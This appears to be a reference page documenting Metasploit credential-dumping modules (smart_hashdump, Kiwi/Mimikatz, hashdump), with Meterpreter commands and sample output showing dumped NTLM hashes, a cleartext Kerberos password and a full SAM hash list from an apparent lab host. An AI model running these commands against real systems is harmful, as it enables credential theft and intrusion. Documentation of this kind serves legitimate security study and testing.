smart_hashdump

⚠ Use on Domain Controllers only. Use the regular hashdump for non-DCs.

Description

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

Platform	Windows
Author	Carlos Perez
License	BSD 3-Clause
URL	smart_hashdump.rb

Usage

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
  SESSION                     yes       The session to run this module on

Examples

run post/windows/gather/smart_hashdump

This is all there is to it.

Blog Posts

Mimikatz Kiwi

Description

Mimikatz is a well known tool to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. Kiwi is the Metasploit implementation.

Platform	Windows
Author	gentilkiwi (Benjamin DELPY)
License	Creative Commons 4.0
URL	https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.

creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts

hashdump

Description

This module will dump the local user accounts from the SAM database using the registry.

Platform	Windows
Author	Metasploit
License	BSD 3-Clause
URL	hashdump.rb

Usage

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Examples

run post/windows/gather/hashdump

Here are the results of running this command from a meterpreter session.

meterpreter > run post/windows/gather/hashdump
 
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
 
No users with password hints on this system
 
[*] Dumping password hashes...
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::

Blog Posts

Tag: metasploit